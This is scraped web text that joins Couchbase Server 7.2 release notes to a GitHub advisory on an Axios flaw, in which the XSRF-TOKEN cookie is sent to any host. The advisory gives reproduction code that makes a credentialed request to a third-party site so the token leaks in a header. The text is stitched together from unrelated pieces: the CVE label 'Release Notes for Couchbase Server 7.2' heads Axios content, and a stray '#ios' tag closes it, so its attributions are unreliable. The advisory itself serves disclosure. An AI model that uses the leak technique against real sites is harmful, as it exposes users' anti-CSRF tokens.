The ANY filter is now applied on an index scan itself when covering an index scan with flatten keys.

MB-56683

Inter-service read timeout errors were not detected or handled accordingly. User requests consequently failed with timeout errors without retrying with a new connection.

The error handling and retry mechanism has been modified to handle these types of timeout issues and errors.

MB-56727

Under certain circumstances, a query with UNNEST used a covering index scan and incorrect results were returned. Reference to the UNNEST expression should have prevented the covering index from being used for the query as the index did not contain the entire array.

The logic to determine covering UNNEST scans has been changed to not use a covering index scan for such queries.

MB-56937

When an index scan had multiple spans, index selectivity was incorrectly calculated.

Index selectivity for multiple index spans is now correctly calculated.

MB-57024

Incorrect results were returned for a non-IndexScan on a constant false condition. This was due to incorrect handling of a FALSE WHERE clause.

The FALSE WHERE clause is now correctly handled.

MB-57029

Querying system:functions\_cache in a multi query node cluster returned incomplete results with warnings. The query result included entries in the local query node, but none from remote query nodes. This was due to a typographical error.

The typographical error has been corrected.

MB-57080

A panic in go\_json.stateInString under parsed value functions caused by incorrect concurrent access resulted in the state being freed whilst still in use.

The concurrent access issue has been resolved.

MB-57251

A Prepared statement might have resulted in an incorrect result in a multi-node environment. For example, a database with two query nodes.

Correlated subqueries from an encoded plan are now detected and marked. This ensures correct results are provided.

MB-57279

When a WITH clause (common table expression, or CTE) was used inside a subquery, and the WITH clause definition referenced the parent query, and was correlated, the query engine did not properly detect the correlation. This produced an incorrect result from the WITH clause evaluation because the result was not cached correctly.

Correlations inside WITH clause definitions are now properly detected.

MB-57316

cbq required a client authentication key file whenever a certificate authority file was used.

cbq now accepts a certificate authority file without a client key file enabling use with username and password credentials.

MB-57680

When appropriate optimizer statistics were used in Cost-Based Optimizer (CBO), for a query with ORDER BY, if there were multiple indexes available for the query, CBO unconditionally favored an index that provided ordering. Such indexes were not always the best ones to use.

CBO now allows cost-based comparison of indexes.

MB-57838

An ADVISE statement with multiple levels of UNNEST caused a syntax error in the CREATE INDEX statement from the Index Advisor.

ADVISE has been improved when there are queries with multiple levels of UNNEST.

**Cluster Manager**

  

Issue

Description

Resolution

MB-57484

A Cluster Manager process crash meant the Delete Bucket memcached command was not always called before bucket files were deleted later in rebalance. This caused the memcached process to crash repeatedly causing data service downtime.

The Delete Bucket command is now called on memcached before a file is deleted during rebalance. This ensures mencached doesn’t attempt to read the files.

**Cross Datacenter Replication (XDCR)**

  

Issue

Description

Resolution

MB-56601

Data streamed from the Data Service over XDCR should always be streamed in order by mutation id. However, in some scenarios, for efficiency, the Data Service streamed records that were not ordered by mutation id. In certain situations, this out-of-sequence-order \[OSO\] caused performance issues.

OSO mode is now available as a global override to be switched off for any currently deployed replications to avoid performance issues.

MB-56711

XDCR did not process documents with a JSON array and Extended Attributes (XATTRs). When a document contained XATTRs, XDCR checked for XATTRs in transactions, transaction filters were enabled, and XATTRs were not checked.

When documents contain arrays, XATTRs are now checked in the transaction XATTRs, and the document is not prevented from being parsed in an array.

MB-56741

Binary documents were replicated when an Advanced Filtering Expression was present.

A filter has been added which can be turned on to prevent all binary documents from being replicated.

MB-56773

It appeared that XDCR had stalled and an explanation was not provided. For rebalances on the source or target, the XDCR pipeline should be restarted, and data movement should continue. Before the pipeline was restated, there might have been fewer data movements as the rebalanced VBs were no longer streaming.

An ETA is now provided in the Server UI to show when the pipeline is due to be restarted.

MB-56799

Checkpoint Manager created checkpoint records out-of-sequence when many target nodes ran slowly.

Checkpoint Manager now creates checkpoints in sequence when target nodes are slow.

MB-56848

The bucket topology service sent a concurrent map iteration and map write panic to XDCR which caused a fatal error.

Validation has been improved to prevent the panic from happening.

MB-56938

Prometheus stats did not include a pipeline’s status.

The pipeline status is now provided as part of a prometheus stat.

MB-57130

A Checkpoint Manager Initialization error caused two memory leak types. These were a backfill pipeline and a main pipeline memory leak.

The Pipeline Manager and backfill pipeline have both been modified to prevent the memory leaks.

MB-57183

XDCR Checkpoint Manager instances were not cleaned up under certain circumstances due to timing and networking issues when contacting target, or when an invalid backfill task was fed in as input.

Checkpoint Manager instances are now cleaned up. A flag has been added to check for invalid backfill tasks.

MB-57234

When a replication spec change was made to a non-Data Service node, delete replication hung and caused the node to return an incorrect replication configuration.

XDCR now checks that the node is running the Data Service and handles it correctly.

MB-57277

XDCR could fail due to multiple connection issues. For example, DNS issues or firewalls. For a number of databases, it was a difficult task to manually check every node to determine where the connection issue was. For multiple nodes in a database and in the target database, debugging the issue required many connection checks.

A connection pre-check feature has been added to XDCR which ensures all connections from source nodes to target nodes are valid. Credentials are now also checked.

MB-57412

Running ipv6 only mode + non-encrypted remote resulted in invalid IP addresses being returned, leading to connection issues.

A valid IP address is now returned.

MB-57462

StatsMgr stopping could hang due to watching for notifications resulting in stranded go-routines.

Go-routines are now stopped correctly.

MB-57562

When ipv4 only mode was used, and full encryption only had an alternate address configured where the internal address was unresolvable, XDCR resulted in an error when it contacted the target data nodes.

The specific scenario has been fixed so that replication can now proceed.

MB-57743

The Prometheus endpoint did not expose any XDCR error metrics.

XDCR error metrics are now exposed via Prometheus.

MB-57787

A legacy race condition where metadata store could cause a conflict was exposed as part of the binary filter improvements.

Legacy race conditions have all been resolved.

MB-58203

Under certain circumstances, when rebalancing, the target cluster could return an EACCESS error code that caused source XDCR to pause the pipeline.

This has been reversed. Instead of pausing the pipeline when rebalancing, XDCR now retries when an EACCESS error is encountered in XmemNozzle. XDCR counts and prints this activity in the log.

MB-58545

Checkpoint Manager could be stuck when stopping if it had not been started yet, resulting in memory leak.

Checkpoint Manager can now be stopped correctly even when it hasn’t been started.

**Metrics and Monitoring**

  

Issue

Description

Resolution

MB-56464

An issue occurred where the Cluster Manager instructed Prometheus to reload the configuration and the reload timeout impacted other requests.

The Cluster Manager has been improved to handle timeouts when instructing Prometheus to reload the configuration.

MB-56517

The Cluster Manager’s computed utilization stats were inaccurate due to time interval discrepancies in components where data was collected.

The Cluster Manager now reports raw stats as Prometheus counters.

**Storage**

  

Issue

Description

Resolution

MB-57157

Inconsistencies were observed where a single Magma bucket in a database took a long time to warm up.

The seq index scan has been optimized for tombstones of zero value size. Optimization is for look up by key, sequence iteration, and key iteration. Docs of 0 value size are placed in both key index and seq index.

MB-57714

Disk backfills were hanging permanently due to high memory consumption when large documents were streamed over many DCP streams concurrently.

Memory for a document read by a DCP stream is now released before switching to another stream.

**Known Issues**

**Search Service**

  

Issue

Description

Workaround

MB-58450

An issue occurs with node failover. If a user does not bring in a replacement node before the failover occurs, then lost active or lost replica search indexes that have partitions on the replaced node are not rebuilt.  
As a result, search requests return partial/incomplete results. In addition,existing indexes with defined replica(s) become vulnerable to another node failure.

This issue is only pertinent to the **7.2.1** release, and does not affect older builds.

This situation can be prevented if a replacement node was brought into the cluster in place of the failed over node, before starting the rebalance operation. This problem should not affect on-line or off-line rebalances.

If lost indexes are encountered, then, a manual update to the affected search index definition(s) will trigger a rebuild of the affected indexes.  
(The advice here is to toggle the replica count so that unaffected index partitions are re-used, and only the lost partitions are rebuilt.)

CVE-2023-36667: Release Notes for Couchbase Server 7.2

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

**Axios Cross-Site Request Forgery Vulnerability**

Moderate severity GitHub Reviewed Published Nov 8, 2023 to the GitHub Advisory Database • Updated Nov 10, 2023

GHSA-wf5p-g6vw-rhxx: Axios Cross-Site Request Forgery Vulnerability

An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

**Describe the bug**

Hi team, @jasonsaayman and @DigitalBrainJS,

The library inserts the X-XSRF-TOKEN header using the secret XSRF-TOKEN cookie value in **all requests to any server** when the XSRF-TOKEN cookie is available, and the withCredentials setting is turned on. If a malicious user manages to obtain this value, it can potentially lead to the XSRF defence mechanism bypass.

It's crucial to ensure the protection of CSRF tokens. These tokens should be treated as confidential information and managed securely at all times.  
You may check it here:  
https://portswigger.net/web-security/csrf/preventing  
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site\_Request\_Forgery\_Prevention\_Cheat\_Sheet.html

Type of vulnerability: CWE-359: Exposure of Private Personal Information to an Unauthorized Actor  
Severity: High (7.1) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

**To Reproduce**

1.  Start a new project using the latest version of Next.js by running the following command: npx create-next-app@latest. Then, install the latest version of the Axios library with this command: npm i axios
2.  Create an Axios instance with the following configuration, which enables cross-site request forgery (CSRF) protection by including credentials in requests:

      const instance = axios.create({
        withCredentials: true,
      });
    

3.  Install the XSRF-TOKEN cookie with specific attributes. Set the cookie value "whatever" and configuring it for the "localhost" domain with strict same-site policy:

        const cookies = new Cookies();
        cookies.set("XSRF-TOKEN", "whatever", {
          domain: "localhost",
          sameSite: "strict",
        });
    

4.  Initiate a cross-domain request using your Axios instance. In this example, we're making a GET request to "https://www.com/," and we handle the response and potential errors:

        instance
          .get("https://www.com")
          .then((res) => console.log(res.data))
          .catch((err) => console.error(err.message));
    

5.  Run your project, and open the browser's network tab for debugging and monitoring network activity.
6.  Verify that the cross-domain request to "https://www.com/" includes the "X-XSRF-TOKEN" header with the value "whatever."
7.  Confirm that the "XSRF-TOKEN" cookie's value is disclosed to any 3rd-party host when making requests using the Axios instance. **This is essential for security as you don't want to leak CSRF tokens to unauthorized entities.**

**Code snippet**

lib/adapters/xhr.js:191
const xsrfValue \= (config.withCredentials || isURLSameOrigin(fullPath))

**Expected behavior**

ER: the XSRF-TOKEN is not disclosed to a 3rd party host  
AR: the XSRF-TOKEN is disclosed in every request made with the Axios instance

**Axios Version**

\[v0.8.1\] - \[v1.5.1 (actual)\]

**Adapter Version**

_No response_

**Browser**

_No response_

**Browser Version**

_No response_

**Node.js Version**

_No response_

**OS**

_No response_

**Additional Library Versions**

_No response_

**Additional context/Screenshots**

The current effective solution is to change the default XSRF-TOKEN cookie name in the Axios configuration and manually include the corresponding header only in the specific places where it's necessary

https://prnt.sc/xDcRmFozxSHJ

Tag

#ios